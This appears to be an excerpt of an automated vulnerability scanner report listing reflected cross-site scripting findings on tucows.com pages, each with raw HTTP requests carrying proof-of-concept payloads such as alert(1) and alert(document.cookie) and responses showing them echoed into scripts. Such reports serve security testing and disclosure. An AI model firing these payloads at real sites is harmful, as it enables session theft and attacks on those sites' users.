<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.370. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.371. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.372. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.373. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.374. http://www.tucows.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.htmlb3691"-alert(1)-"68987ea07e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.375. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/index.html?4d0f6"-alert(1)-"63213006432=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.376. http://www.tucows.com/preview/194850/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.377. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/preview/194850212c1"-alert(1)-"9b74dc28a7b/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.378. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b05ac0e6be85c735be622d4531a9aaf6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: b05ac0e6be85c735be622d4531a9aaf6=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 75004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<a name="own" href="http://www.tucows.com/preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb#frmAddCmt" class="leave_a_comment">
...[SNIP]...

3.379. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f13532ef349cd28fcdd6b97f8ca27aca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: f13532ef349cd28fcdd6b97f8ca27aca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x2246b7e"-alert(1)-"8990b025cf5";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

3.380. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ff504b2daba6b2fa5976c8353e088e5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4ff504b2daba6b2fa5976c8353e088e5=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

3.381. http://www.tucows.com/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
